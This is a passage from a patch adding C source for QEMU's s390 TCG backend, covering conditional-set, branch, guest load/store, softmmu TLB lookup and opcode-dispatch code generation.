TCG_TMP0, c2); + } + tcg_out_movi(s, TCG_TYPE_I64, dest, 0); + } + tcg_out_insn(s, RRE, ALCGR, dest, dest); + return; + + case TCG_COND_LEU: + case TCG_COND_LTU: + case TCG_COND_LT: + /* Swap operands so that we can use GEU/GTU/GT. */ + if (c2const) { + tcg_out_movi(s, type, TCG_TMP0, c2); + c2 = c1; + c2const = 0; + c1 = TCG_TMP0; + } else { + TCGReg t = c1; + c1 = c2; + c2 = t; + } + if (cond == TCG_COND_LEU) { + goto do_geu; + } + cond = tcg_swap_cond(cond); + goto do_greater; + + case TCG_COND_NE: + /* X != 0 is X > 0. */ + if (c2const && c2 == 0) { + cond = TCG_COND_GTU; + goto do_greater; + } + break; + + case TCG_COND_EQ: + /* X == 0 is X <= 0 is 0 >= X. */ + if (c2const && c2 == 0) { + tcg_out_movi(s, TCG_TYPE_I64, TCG_TMP0, 0); + c2 = c1; + c2const = 0; + c1 = TCG_TMP0; + goto do_geu; + } + break; + + default: + break; + } + + cc = tgen_cmp(s, type, cond, c1, c2, c2const); + if (facilities & FACILITY_LOAD_ON_COND) { + /* Emit: d = 0, t = 1, d = (cc ? t : d). 
*/ + tcg_out_movi(s, TCG_TYPE_I64, dest, 0); + tcg_out_movi(s, TCG_TYPE_I64, TCG_TMP0, 1); + tcg_out_insn(s, RRF, LOCGR, dest, TCG_TMP0, cc); + } else { + /* Emit: d = 1; if (cc) goto over; d = 0; over: */ + tcg_out_movi(s, type, dest, 1); + tcg_out_insn(s, RI, BRC, cc, (4 + 4) >> 1); + tcg_out_movi(s, type, dest, 0); + } +} + +static void tgen_movcond(TCGContext *s, TCGType type, TCGCond c, TCGReg dest, + TCGReg c1, TCGArg c2, int c2const, TCGReg r3) +{ + int cc; + if (facilities & FACILITY_LOAD_ON_COND) { + cc = tgen_cmp(s, type, c, c1, c2, c2const); + tcg_out_insn(s, RRF, LOCGR, dest, r3, cc); + } else { + c = tcg_invert_cond(c); + cc = tgen_cmp(s, type, c, c1, c2, c2const); + + /* Emit: if (cc) goto over; dest = r3; over: */ + tcg_out_insn(s, RI, BRC, cc, (4 + 4) >> 1); + tcg_out_insn(s, RRE, LGR, dest, r3); + } +} + +bool tcg_target_deposit_valid(int ofs, int len) +{ + return (facilities & FACILITY_GEN_INST_EXT) != 0; +} + +static void tgen_deposit(TCGContext *s, TCGReg dest, TCGReg src, + int ofs, int len) +{ + int lsb = (63 - ofs); + int msb = lsb - (len - 1); + tcg_out_risbg(s, dest, src, msb, lsb, ofs, 0); +} + +static void tgen_gotoi(TCGContext *s, int cc, tcg_insn_unit *dest) +{ + ptrdiff_t off = dest - s->code_ptr; + if (off == (int16_t)off) { + tcg_out_insn(s, RI, BRC, cc, off); + } else if (off == (int32_t)off) { + tcg_out_insn(s, RIL, BRCL, cc, off); + } else { + tcg_out_movi(s, TCG_TYPE_PTR, TCG_TMP0, (uintptr_t)dest); + tcg_out_insn(s, RR, BCR, cc, TCG_TMP0); + } +} + +static void tgen_branch(TCGContext *s, int cc, int labelno) +{ + TCGLabel* l = &s->labels[labelno]; + if (l->has_value) { + tgen_gotoi(s, cc, l->u.value_ptr); + } else if (USE_LONG_BRANCHES) { + tcg_out16(s, RIL_BRCL | (cc << 4)); + tcg_out_reloc(s, s->code_ptr, R_390_PC32DBL, labelno, -2); + s->code_ptr += 2; + } else { + tcg_out16(s, RI_BRC | (cc << 4)); + tcg_out_reloc(s, s->code_ptr, R_390_PC16DBL, labelno, -2); + s->code_ptr += 1; + } +} + +static void 
tgen_compare_branch(TCGContext *s, S390Opcode opc, int cc, + TCGReg r1, TCGReg r2, int labelno) +{ + TCGLabel* l = &s->labels[labelno]; + intptr_t off; + + if (l->has_value) { + off = l->u.value_ptr - s->code_ptr; + } else { + /* We need to keep the offset unchanged for retranslation. */ + off = s->code_ptr[1]; + tcg_out_reloc(s, s->code_ptr + 1, R_390_PC16DBL, labelno, -2); + } + + tcg_out16(s, (opc & 0xff00) | (r1 << 4) | r2); + tcg_out16(s, off); + tcg_out16(s, cc << 12 | (opc & 0xff)); +} + +static void tgen_compare_imm_branch(TCGContext *s, S390Opcode opc, int cc, + TCGReg r1, int i2, int labelno) +{ + TCGLabel* l = &s->labels[labelno]; + tcg_target_long off; + + if (l->has_value) { + off = l->u.value_ptr - s->code_ptr; + } else { + /* We need to keep the offset unchanged for retranslation. */ + off = s->code_ptr[1]; + tcg_out_reloc(s, s->code_ptr + 1, R_390_PC16DBL, labelno, -2); + } + + tcg_out16(s, (opc & 0xff00) | (r1 << 4) | cc); + tcg_out16(s, off); + tcg_out16(s, (i2 << 8) | (opc & 0xff)); +} + +static void tgen_brcond(TCGContext *s, TCGType type, TCGCond c, + TCGReg r1, TCGArg c2, int c2const, int labelno) +{ + int cc; + + if (facilities & FACILITY_GEN_INST_EXT) { + bool is_unsigned = is_unsigned_cond(c); + bool in_range; + S390Opcode opc; + + cc = tcg_cond_to_s390_cond[c]; + + if (!c2const) { + opc = (type == TCG_TYPE_I32 + ? (is_unsigned ? RIE_CLRJ : RIE_CRJ) + : (is_unsigned ? RIE_CLGRJ : RIE_CGRJ)); + tgen_compare_branch(s, opc, cc, r1, c2, labelno); + return; + } + + /* COMPARE IMMEDIATE AND BRANCH RELATIVE has an 8-bit immediate field. + If the immediate we've been given does not fit that range, we'll + fall back to separate compare and branch instructions using the + larger comparison range afforded by COMPARE IMMEDIATE. 
*/ + if (type == TCG_TYPE_I32) { + if (is_unsigned) { + opc = RIE_CLIJ; + in_range = (uint32_t)c2 == (uint8_t)c2; + } else { + opc = RIE_CIJ; + in_range = (int32_t)c2 == (int8_t)c2; + } + } else { + if (is_unsigned) { + opc = RIE_CLGIJ; + in_range = (uint64_t)c2 == (uint8_t)c2; + } else { + opc = RIE_CGIJ; + in_range = (int64_t)c2 == (int8_t)c2; + } + } + if (in_range) { + tgen_compare_imm_branch(s, opc, cc, r1, c2, labelno); + return; + } + } + + cc = tgen_cmp(s, type, c, r1, c2, c2const); + tgen_branch(s, cc, labelno); +} + +static void tcg_out_call(TCGContext *s, tcg_insn_unit *dest) +{ + ptrdiff_t off = dest - s->code_ptr; + if (off == (int32_t)off) { + tcg_out_insn(s, RIL, BRASL, TCG_REG_R14, off); + } else { + tcg_out_movi(s, TCG_TYPE_PTR, TCG_TMP0, (uintptr_t)dest); + tcg_out_insn(s, RR, BASR, TCG_REG_R14, TCG_TMP0); + } +} + +static void tcg_out_qemu_ld_direct(TCGContext *s, TCGMemOp opc, TCGReg data, + TCGReg base, TCGReg index, int disp) +{ + switch (opc) { + case MO_UB: + tcg_out_insn(s, RXY, LLGC, data, base, index, disp); + break; + case MO_SB: + tcg_out_insn(s, RXY, LGB, data, base, index, disp); + break; + + case MO_UW | MO_BSWAP: + /* swapped unsigned halfword load with upper bits zeroed */ + tcg_out_insn(s, RXY, LRVH, data, base, index, disp); + tgen_ext16u(s, TCG_TYPE_I64, data, data); + break; + case MO_UW: + tcg_out_insn(s, RXY, LLGH, data, base, index, disp); + break; + + case MO_SW | MO_BSWAP: + /* swapped sign-extended halfword load */ + tcg_out_insn(s, RXY, LRVH, data, base, index, disp); + tgen_ext16s(s, TCG_TYPE_I64, data, data); + break; + case MO_SW: + tcg_out_insn(s, RXY, LGH, data, base, index, disp); + break; + + case MO_UL | MO_BSWAP: + /* swapped unsigned int load with upper bits zeroed */ + tcg_out_insn(s, RXY, LRV, data, base, index, disp); + tgen_ext32u(s, data, data); + break; + case MO_UL: + tcg_out_insn(s, RXY, LLGF, data, base, index, disp); + break; + + case MO_SL | MO_BSWAP: + /* swapped sign-extended int load */ + 
tcg_out_insn(s, RXY, LRV, data, base, index, disp); + tgen_ext32s(s, data, data); + break; + case MO_SL: + tcg_out_insn(s, RXY, LGF, data, base, index, disp); + break; + + case MO_Q | MO_BSWAP: + tcg_out_insn(s, RXY, LRVG, data, base, index, disp); + break; + case MO_Q: + tcg_out_insn(s, RXY, LG, data, base, index, disp); + break; + + default: + tcg_abort(); + } +} + +static void tcg_out_qemu_st_direct(TCGContext *s, TCGMemOp opc, TCGReg data, + TCGReg base, TCGReg index, int disp) +{ + switch (opc) { + case MO_UB: + if (disp >= 0 && disp < 0x1000) { + tcg_out_insn(s, RX, STC, data, base, index, disp); + } else { + tcg_out_insn(s, RXY, STCY, data, base, index, disp); + } + break; + + case MO_UW | MO_BSWAP: + tcg_out_insn(s, RXY, STRVH, data, base, index, disp); + break; + case MO_UW: + if (disp >= 0 && disp < 0x1000) { + tcg_out_insn(s, RX, STH, data, base, index, disp); + } else { + tcg_out_insn(s, RXY, STHY, data, base, index, disp); + } + break; + + case MO_UL | MO_BSWAP: + tcg_out_insn(s, RXY, STRV, data, base, index, disp); + break; + case MO_UL: + if (disp >= 0 && disp < 0x1000) { + tcg_out_insn(s, RX, ST, data, base, index, disp); + } else { + tcg_out_insn(s, RXY, STY, data, base, index, disp); + } + break; + + case MO_Q | MO_BSWAP: + tcg_out_insn(s, RXY, STRVG, data, base, index, disp); + break; + case MO_Q: + tcg_out_insn(s, RXY, STG, data, base, index, disp); + break; + + default: + tcg_abort(); + } +} + +#if defined(CONFIG_SOFTMMU) +/* We're expecting to use a 20-bit signed offset on the tlb memory ops. + Using the offset of the second entry in the last tlb table ensures + that we can index all of the elements of the first entry. */ +QEMU_BUILD_BUG_ON(offsetof(CPUArchState, tlb_table[NB_MMU_MODES - 1][1]) + > 0x7ffff); + +/* Load and compare a TLB entry, leaving the flags set. Loads the TLB + addend into R2. Returns a register with the santitized guest address. 
*/ +static TCGReg tcg_out_tlb_read(TCGContext* s, TCGReg addr_reg, TCGMemOp opc, + int mem_index, bool is_ld) +{ + TCGMemOp s_bits = opc & MO_SIZE; + uint64_t tlb_mask = TARGET_PAGE_MASK | ((1 << s_bits) - 1); + int ofs; + + if (facilities & FACILITY_GEN_INST_EXT) { + tcg_out_risbg(s, TCG_REG_R2, addr_reg, + 64 - CPU_TLB_BITS - CPU_TLB_ENTRY_BITS, + 63 - CPU_TLB_ENTRY_BITS, + 64 + CPU_TLB_ENTRY_BITS - TARGET_PAGE_BITS, 1); + tgen_andi_risbg(s, TCG_REG_R3, addr_reg, tlb_mask); + } else { + tcg_out_sh64(s, RSY_SRLG, TCG_REG_R2, addr_reg, TCG_REG_NONE, + TARGET_PAGE_BITS - CPU_TLB_ENTRY_BITS); + tcg_out_movi(s, TCG_TYPE_TL, TCG_REG_R3, addr_reg); + tgen_andi(s, TCG_TYPE_I64, TCG_REG_R2, + (CPU_TLB_SIZE - 1) << CPU_TLB_ENTRY_BITS); + tgen_andi(s, TCG_TYPE_TL, TCG_REG_R3, tlb_mask); + } + + if (is_ld) { + ofs = offsetof(CPUArchState, tlb_table[mem_index][0].addr_read); + } else { + ofs = offsetof(CPUArchState, tlb_table[mem_index][0].addr_write); + } + if (TARGET_LONG_BITS == 32) { + tcg_out_mem(s, RX_C, RXY_CY, TCG_REG_R3, TCG_REG_R2, TCG_AREG0, ofs); + } else { + tcg_out_mem(s, 0, RXY_CG, TCG_REG_R3, TCG_REG_R2, TCG_AREG0, ofs); + } + + ofs = offsetof(CPUArchState, tlb_table[mem_index][0].addend); + tcg_out_mem(s, 0, RXY_LG, TCG_REG_R2, TCG_REG_R2, TCG_AREG0, ofs); + + if (TARGET_LONG_BITS == 32) { + tgen_ext32u(s, TCG_REG_R3, addr_reg); + return TCG_REG_R3; + } + return addr_reg; +} + +static void add_qemu_ldst_label(TCGContext *s, bool is_ld, TCGMemOp opc, + TCGReg data, TCGReg addr, int mem_index, + tcg_insn_unit *raddr, tcg_insn_unit *label_ptr) +{ + TCGLabelQemuLdst *label = new_ldst_label(s); + + label->is_ld = is_ld; + label->opc = opc; + label->datalo_reg = data; + label->addrlo_reg = addr; + label->mem_index = mem_index; + label->raddr = raddr; + label->label_ptr[0] = label_ptr; +} + +static void tcg_out_qemu_ld_slow_path(TCGContext *s, TCGLabelQemuLdst *lb) +{ + TCGReg addr_reg = lb->addrlo_reg; + TCGReg data_reg = lb->datalo_reg; + TCGMemOp opc = lb->opc; + 
+ patch_reloc(lb->label_ptr[0], R_390_PC16DBL, (intptr_t)s->code_ptr, -2); + + tcg_out_mov(s, TCG_TYPE_PTR, TCG_REG_R2, TCG_AREG0); + if (TARGET_LONG_BITS == 64) { + tcg_out_mov(s, TCG_TYPE_I64, TCG_REG_R3, addr_reg); + } + tcg_out_movi(s, TCG_TYPE_I32, TCG_REG_R4, lb->mem_index); + tcg_out_movi(s, TCG_TYPE_PTR, TCG_REG_R5, (uintptr_t)lb->raddr); + tcg_out_call(s, qemu_ld_helpers[opc]); + tcg_out_mov(s, TCG_TYPE_I64, data_reg, TCG_REG_R2); + + tgen_gotoi(s, S390_CC_ALWAYS, lb->raddr); +} + +static void tcg_out_qemu_st_slow_path(TCGContext *s, TCGLabelQemuLdst *lb) +{ + TCGReg addr_reg = lb->addrlo_reg; + TCGReg data_reg = lb->datalo_reg; + TCGMemOp opc = lb->opc; + + patch_reloc(lb->label_ptr[0], R_390_PC16DBL, (intptr_t)s->code_ptr, -2); + + tcg_out_mov(s, TCG_TYPE_PTR, TCG_REG_R2, TCG_AREG0); + if (TARGET_LONG_BITS == 64) { + tcg_out_mov(s, TCG_TYPE_I64, TCG_REG_R3, addr_reg); + } + switch (opc & MO_SIZE) { + case MO_UB: + tgen_ext8u(s, TCG_TYPE_I64, TCG_REG_R4, data_reg); + break; + case MO_UW: + tgen_ext16u(s, TCG_TYPE_I64, TCG_REG_R4, data_reg); + break; + case MO_UL: + tgen_ext32u(s, TCG_REG_R4, data_reg); + break; + case MO_Q: + tcg_out_mov(s, TCG_TYPE_I64, TCG_REG_R4, data_reg); + break; + default: + tcg_abort(); + } + tcg_out_movi(s, TCG_TYPE_I32, TCG_REG_R5, lb->mem_index); + tcg_out_movi(s, TCG_TYPE_PTR, TCG_REG_R6, (uintptr_t)lb->raddr); + tcg_out_call(s, qemu_st_helpers[opc]); + + tgen_gotoi(s, S390_CC_ALWAYS, lb->raddr); +} +#else +static void tcg_prepare_user_ldst(TCGContext *s, TCGReg *addr_reg, + TCGReg *index_reg, tcg_target_long *disp) +{ + if (TARGET_LONG_BITS == 32) { + tgen_ext32u(s, TCG_TMP0, *addr_reg); + *addr_reg = TCG_TMP0; + } + if (GUEST_BASE < 0x80000) { + *index_reg = TCG_REG_NONE; + *disp = GUEST_BASE; + } else { + *index_reg = TCG_GUEST_BASE_REG; + *disp = 0; + } +} +#endif /* CONFIG_SOFTMMU */ + +static void tcg_out_qemu_ld(TCGContext* s, TCGReg data_reg, TCGReg addr_reg, + TCGMemOp opc, int mem_index) +{ +#ifdef CONFIG_SOFTMMU + 
tcg_insn_unit *label_ptr; + TCGReg base_reg; + + base_reg = tcg_out_tlb_read(s, addr_reg, opc, mem_index, 1); + + label_ptr = s->code_ptr + 1; + tcg_out_insn(s, RI, BRC, S390_CC_NE, 0); + + tcg_out_qemu_ld_direct(s, opc, data_reg, base_reg, TCG_REG_R2, 0); + + add_qemu_ldst_label(s, 1, opc, data_reg, addr_reg, mem_index, + s->code_ptr, label_ptr); +#else + TCGReg index_reg; + tcg_target_long disp; + + tcg_prepare_user_ldst(s, &addr_reg, &index_reg, &disp); + tcg_out_qemu_ld_direct(s, opc, data_reg, addr_reg, index_reg, disp); +#endif +} + +static void tcg_out_qemu_st(TCGContext* s, TCGReg data_reg, TCGReg addr_reg, + TCGMemOp opc, int mem_index) +{ +#ifdef CONFIG_SOFTMMU + tcg_insn_unit *label_ptr; + TCGReg base_reg; + + base_reg = tcg_out_tlb_read(s, addr_reg, opc, mem_index, 0); + + label_ptr = s->code_ptr + 1; + tcg_out_insn(s, RI, BRC, S390_CC_NE, 0); + + tcg_out_qemu_st_direct(s, opc, data_reg, base_reg, TCG_REG_R2, 0); + + add_qemu_ldst_label(s, 0, opc, data_reg, addr_reg, mem_index, + s->code_ptr, label_ptr); +#else + TCGReg index_reg; + tcg_target_long disp; + + tcg_prepare_user_ldst(s, &addr_reg, &index_reg, &disp); + tcg_out_qemu_st_direct(s, opc, data_reg, addr_reg, index_reg, disp); +#endif +} + +# define OP_32_64(x) \ + case glue(glue(INDEX_op_,x),_i32): \ + case glue(glue(INDEX_op_,x),_i64) + +static inline void tcg_out_op(TCGContext *s, TCGOpcode opc, + const TCGArg *args, const int *const_args) +{ + S390Opcode op; + TCGArg a0, a1, a2; + + switch (opc) { + case INDEX_op_exit_tb: + /* return value */ + tcg_out_movi(s, TCG_TYPE_PTR, TCG_REG_R2, args[0]); + tgen_gotoi(s, S390_CC_ALWAYS, tb_ret_addr); + break; + + case INDEX_op_goto_tb: + if (s->tb_jmp_offset) { + tcg_out16(s, RIL_BRCL | (S390_CC_ALWAYS << 4)); + s->tb_jmp_offset[args[0]] = tcg_current_code_size(s); + s->code_ptr += 2; + } else { + /* load address stored at s->tb_next + args[0] */ + tcg_out_ld_abs(s, TCG_TYPE_PTR, TCG_TMP0, s->tb_next + args[0]); + /* and go there */ + tcg_out_insn(s, 
RR, BCR, S390_CC_ALWAYS, TCG_TMP0); + } + s->tb_next_offset[args[0]] = tcg_current_code_size(s); + break; + + OP_32_64(ld8u): + /* ??? LLC (RXY format) is only present with the extended-immediate + facility, whereas LLGC is always present. */ + tcg_out_mem(s, 0, RXY_LLGC, args[0], args[1], TCG_REG_NONE, args[2]); + break; + + OP_32_64(ld8s): + /* ??? LB is no smaller than LGB, so no point to using it. */ + tcg_out_mem(s, 0, RXY_LGB, args[0], args[1], TCG_REG_NONE, args[2]); + break; + + OP_32_64(ld16u): + /* ??? LLH (RXY format) is only present with the extended-immediate + facility, whereas LLGH is always present. */ + tcg_out_mem(s, 0, RXY_LLGH, args[0], args[1], TCG_REG_NONE, args[2]); + break; + + case INDEX_op_ld16s_i32: + tcg_out_mem(s, RX_LH, RXY_LHY, args[0], args[1], TCG_REG_NONE, args[2]); + break; + + case INDEX_op_ld_i32: + tcg_out_ld(s, TCG_TYPE_I32, args[0], args[1], args[2]); + break; + + OP_32_64(st8): + tcg_out_mem(s, RX_STC, RXY_STCY, args[0], args[1], + TCG_REG_NONE, args[2]); + break; + + OP_32_64(st16): + tcg_out_mem(s, RX_STH, RXY_STHY, args[0], args[1], + TCG_REG_NONE, args[2]); + break; + + case INDEX_op_st_i32: + tcg_out_st(s, TCG_TYPE_I32, args[0], args[1], args[2]); + break; + + case INDEX_op_add_i32: + a0 = args[0], a1 = args[1], a2 = (int32_t)args[2]; + if (const_args[2]) { + do_addi_32: + if (a0 == a1) { + if (a2 == (int16_t)a2) { + tcg_out_insn(s, RI, AHI, a0, a2); + break; + } + if (facilities & FACILITY_EXT_IMM) { + tcg_out_insn(s, RIL, AFI, a0, a2); + break; + } + } + tcg_out_mem(s, RX_LA, RXY_LAY, a0, a1, TCG_REG_NONE, a2); + } else if (a0 == a1) { + tcg_out_insn(s, RR, AR, a0, a2); + } else { + tcg_out_insn(s, RX, LA, a0, a1, a2, 0); + } + break; + case INDEX_op_sub_i32: + a0 = args[0], a1 = args[1], a2 = (int32_t)args[2]; + if (const_args[2]) { + a2 = -a2; + goto do_addi_32; + } + tcg_out_insn(s, RR, SR, args[0], args[2]); + break; + + case INDEX_op_and_i32: + if (const_args[2]) { + tgen_andi(s, TCG_TYPE_I32, args[0], args[2]); 
+ } else { + tcg_out_insn(s, RR, NR, args[0], args[2]); + } + break; + case INDEX_op_or_i32: + if (const_args[2]) { + tgen64_ori(s, args[0], args[2] & 0xffffffff); + } else { + tcg_out_insn(s, RR, OR, args[0], args[2]); + } + break; + case INDEX_op_xor_i32: + if (const_args[2]) { + tgen64_xori(s, args[0], args[2] & 0xffffffff); + } else { + tcg_out_insn(s, RR, XR, args[0], args[2]); + } + break; + + case INDEX_op_neg_i32: + tcg_out_insn(s, RR, LCR, args[0], args[1]); + break; + + case INDEX_op_mul_i32: + if (const_args[2]) { + if ((int32_t)args[2] == (int16_t)args[2]) { + tcg_out_insn(s, RI, MHI, args[0], args[2]); + } else { + tcg_out_insn(s, RIL, MSFI, args[0], args[2]); + } + } else { + tcg_out_insn(s, RRE, MSR, args[0], args[2]); + } + break; + + case INDEX_op_div2_i32: + tcg_out_insn(s, RR, DR, TCG_REG_R2, args[4]); + break; + case INDEX_op_divu2_i32: + tcg_out_insn(s, RRE, DLR, TCG_REG_R2, args[4]); + break; + + case INDEX_op_shl_i32: + op = RS_SLL; + do_shift32: + if (const_args[2]) { + tcg_out_sh32(s, op, args[0], TCG_REG_NONE, args[2]); + } else { + tcg_out_sh32(s, op, args[0], args[2], 0); + } + break; + case INDEX_op_shr_i32: + op = RS_SRL; + goto do_shift32; + case INDEX_op_sar_i32: + op = RS_SRA; + goto do_shift32; + + case INDEX_op_rotl_i32: + /* ??? Using tcg_out_sh64 here for the format; it is a 32-bit rol. 
*/ + if (const_args[2]) { + tcg_out_sh64(s, RSY_RLL, args[0], args[1], TCG_REG_NONE, args[2]); + } else { + tcg_out_sh64(s, RSY_RLL, args[0], args[1], args[2], 0); + } + break; + case INDEX_op_rotr_i32: + if (const_args[2]) { + tcg_out_sh64(s, RSY_RLL, args[0], args[1], + TCG_REG_NONE, (32 - args[2]) & 31); + } else { + tcg_out_insn(s, RR, LCR, TCG_TMP0, args[2]); + tcg_out_sh64(s, RSY_RLL, args[0], args[1], TCG_TMP0, 0); + } + break; + + case INDEX_op_ext8s_i32: + tgen_ext8s(s, TCG_TYPE_I32, args[0], args[1]); + break; + case INDEX_op_ext16s_i32: + tgen_ext16s(s, TCG_TYPE_I32, args[0], args[1]); + break; + case INDEX_op_ext8u_i32: + tgen_ext8u(s, TCG_TYPE_I32, args[0], args[1]); + break; + case INDEX_op_ext16u_i32: + tgen_ext16u(s, TCG_TYPE_I32, args[0], args[1]); + break; + + OP_32_64(bswap16): + /* The TCG bswap definition requires bits 0-47 already be zero. + Thus we don't need the G-type insns to implement bswap16_i64. */ + tcg_out_insn(s, RRE, LRVR, args[0], args[1]); + tcg_out_sh32(s, RS_SRL, args[0], TCG_REG_NONE, 16); + break; + OP_32_64(bswap32): + tcg_out_insn(s, RRE, LRVR, args[0], args[1]); + break; + + case INDEX_op_add2_i32: + if (const_args[4]) { + tcg_out_insn(s, RIL, ALFI, args[0], args[4]); + } else { + tcg_out_insn(s, RR, ALR, args[0], args[4]); + } + tcg_out_insn(s, RRE, ALCR, args[1], args[5]); + break; + case INDEX_op_sub2_i32: + if (const_args[4]) { + tcg_out_insn(s, RIL, SLFI, args[0], args[4]); + } else { + tcg_out_insn(s, RR, SLR, args[0], args[4]); + } + tcg_out_insn(s, RRE, SLBR, args[1], args[5]); + break; + + case INDEX_op_br: + tgen_branch(s, S390_CC_ALWAYS, args[0]); + break; + + case INDEX_op_brcond_i32: + tgen_brcond(s, TCG_TYPE_I32, args[2], args[0], + args[1], const_args[1], args[3]); + break; + case INDEX_op_setcond_i32: + tgen_setcond(s, TCG_TYPE_I32, args[3], args[0], args[1], + args[2], const_args[2]); + break; + case INDEX_op_movcond_i32: + tgen_movcond(s, TCG_TYPE_I32, args[5], args[0], args[1], + args[2], const_args[2], 
args[3]); + break; + + case INDEX_op_qemu_ld_i32: + /* ??? Technically we can use a non-extending instruction. */ + case INDEX_op_qemu_ld_i64: + tcg_out_qemu_ld(s, args[0], args[1], args[2], args[3]); + break; + case INDEX_op_qemu_st_i32: + case INDEX_op_qemu_st_i64: + tcg_out_qemu_st(s, args[0], args[1], args[2], args[3]); + break; + + case INDEX_op_ld16s_i64: + tcg_out_mem(s, 0, RXY_LGH, args[0], args[1], TCG_REG_NONE, args[2]); + break; + case INDEX_op_ld32u_i64: + tcg_out_mem(s, 0, RXY_LLGF, args[0], args[1], TCG_REG_NONE, args[2]); + break; + case INDEX_op_ld32s_i64: + tcg_out_mem(s, 0, RXY_LGF, args[0], args[1], TCG_REG_NONE, args[2]); + break; + case INDEX_op_ld_i64: + tcg_out_ld(s, TCG_TYPE_I64, args[0], args[1], args[2]); + break; + + case INDEX_op_st32_i64: + tcg_out_st(s, TCG_TYPE_I32, args[0], args[1], args[2]); + break; + case INDEX_op_st_i64: + tcg_out_st(s, TCG_TYPE_I64, args[0], args[1], args[2]); + break; + + case INDEX_op_add_i64: + a0 = args[0], a1 = args[1], a2 = args[2]; + if (const_args[2]) { + do_addi_64: + if (a0 == a1) { + if (a2 == (int16_t)a2) { + tcg_out_insn(s, RI, AGHI, a0, a2); + break; + } + if (facilities & FACILITY_EXT_IMM) { + if (a2 == (int32_t)a2) { + tcg_out_insn(s, RIL, AGFI, a0, a2); + break; + } else if (a2 == (uint32_t)a2) { + tcg_out_insn(s, RIL, ALGFI, a0, a2); + break; + } else if (-a2 == (uint32_t)-a2) { + tcg_out_insn(s, RIL, SLGFI, a0, -a2); + break; + } + } + } + tcg_out_mem(s, RX_LA, RXY_LAY, a0, a1, TCG_REG_NONE, a2); + } else if (a0 == a1) { + tcg_out_insn(s, RRE, AGR, a0, a2); + } else { + tcg_out_insn(s, RX, LA, a0, a1, a2, 0); + } + break; + case INDEX_op_sub_i64: + a0 = args[0], a1 = args[1], a2 = args[2]; + if (const_args[2]) { + a2 = -a2; + goto do_addi_64; + } else { + tcg_out_insn(s, RRE, SGR, args[0], args[2]); + } + break; + + case INDEX_op_and_i64: + if (const_args[2]) { + tgen_andi(s, TCG_TYPE_I64, args[0], args[2]); + } else { + tcg_out_insn(s, RRE, NGR, args[0], args[2]); + } + break; + case 
INDEX_op_or_i64: + if (const_args[2]) { + tgen64_ori(s, args[0], args[2]); + } else { + tcg_out_insn(s, RRE, OGR, args[0], args[2]); + } + break; + case INDEX_op_xor_i64: + if (const_args[2]) { + tgen64_xori(s, args[0], args[2]); + } else { + tcg_out_insn(s, RRE, XGR, args[0], args[2]); + } + break; + + case INDEX_op_neg_i64: + tcg_out_insn(s, RRE, LCGR, args[0], args[1]); + break; + case INDEX_op_bswap64_i64: + tcg_out_insn(s, RRE, LRVGR, args[0], args[1]); + break; + + case INDEX_op_mul_i64: + if (const_args[2]) { + if (args[2] == (int16_t)args[2]) { + tcg_out_insn(s, RI, MGHI, args[0], args[2]); + } else { + tcg_out_insn(s, RIL, MSGFI, args[0], args[2]); + } + } else { + tcg_out_insn(s, RRE, MSGR, args[0], args[2]); + } + break; + + case INDEX_op_div2_i64: + /* ??? We get an unnecessary sign-extension of the dividend + into R3 with this definition, but as we do in fact always + produce both quotient and remainder using INDEX_op_div_i64 + instead requires jumping through even more hoops. 
*/ + tcg_out_insn(s, RRE, DSGR, TCG_REG_R2, args[4]); + break; + case INDEX_op_divu2_i64: + tcg_out_insn(s, RRE, DLGR, TCG_REG_R2, args[4]); + break; + case INDEX_op_mulu2_i64: + tcg_out_insn(s, RRE, MLGR, TCG_REG_R2, args[3]); + break; + + case INDEX_op_shl_i64: + op = RSY_SLLG; + do_shift64: + if (const_args[2]) { + tcg_out_sh64(s, op, args[0], args[1], TCG_REG_NONE, args[2]); + } else { + tcg_out_sh64(s, op, args[0], args[1], args[2], 0); + } + break; + case INDEX_op_shr_i64: + op = RSY_SRLG; + goto do_shift64; + case INDEX_op_sar_i64: + op = RSY_SRAG; + goto do_shift64; + + case INDEX_op_rotl_i64: + if (const_args[2]) { + tcg_out_sh64(s, RSY_RLLG, args[0], args[1], + TCG_REG_NONE, args[2]); + } else { + tcg_out_sh64(s, RSY_RLLG, args[0], args[1], args[2], 0); + } + break; + case INDEX_op_rotr_i64: + if (const_args[2]) { + tcg_out_sh64(s, RSY_RLLG, args[0], args[1], + TCG_REG_NONE, (64 - args[2]) & 63); + } else { + /* We can use the smaller 32-bit negate because only the + low 6 bits are examined for the rotate. 
*/ + tcg_out_insn(s, RR, LCR, TCG_TMP0, args[2]); + tcg_out_sh64(s, RSY_RLLG, args[0], args[1], TCG_TMP0, 0); + } + break; + + case INDEX_op_ext8s_i64: + tgen_ext8s(s, TCG_TYPE_I64, args[0], args[1]); + break; + case INDEX_op_ext16s_i64: + tgen_ext16s(s, TCG_TYPE_I64, args[0], args[1]); + break; + case INDEX_op_ext32s_i64: + tgen_ext32s(s, args[0], args[1]); + break; + case INDEX_op_ext8u_i64: + tgen_ext8u(s, TCG_TYPE_I64, args[0], args[1]); + break; + case INDEX_op_ext16u_i64: + tgen_ext16u(s, TCG_TYPE_I64, args[0], args[1]); + break; + case INDEX_op_ext32u_i64: + tgen_ext32u(s, args[0], args[1]); + break; + + case INDEX_op_add2_i64: + if (const_args[4]) { + if ((int64_t)args[4] >= 0) { + tcg_out_insn(s, RIL, ALGFI, args[0], args[4]); + } else { + tcg_out_insn(s, RIL, SLGFI, args[0], -args[4]); + } + } else { + tcg_out_insn(s, RRE, ALGR, args[0], args[4]); + } + tcg_out_insn(s, RRE, ALCGR, args[1], args[5]); + break; + case INDEX_op_sub2_i64: + if (const_args[4]) { + if ((int64_t)args[4] >= 0) { + tcg_out_insn(s, RIL, SLGFI, args[0], args[4]); + } else { + tcg_out_insn(s, RIL, ALGFI, args[0], -args[4]); + } + } else { + tcg_out_insn(s, RRE, SLGR, args[0], args[4]); + } + tcg_out_insn(s, RRE, SLBGR, args[1], args[5]); + break; + + case INDEX_op_brcond_i64: + tgen_brcond(s, TCG_TYPE_I64, args[2], args[0], + args[1], const_args[1], args[3]); + break; + case INDEX_op_setcond_i64: + tgen_setcond(s, TCG_TYPE_I64, args[3], args[0], args[1], + args[2], const_args[2]); + break; + case INDEX_op_movcond_i64: + tgen_movcond(s, TCG_TYPE_I64, args[5], args[0], args[1], + args[2], const_args[2], args[3]); + break; + + OP_32_64(deposit): + tgen_deposit(s, args[0], args[2], args[3], args[4]); + break; + + case INDEX_op_mov_i32: /* Always emitted via tcg_out_mov. */ + case INDEX_op_mov_i64: + case INDEX_op_movi_i32: /* Always emitted via 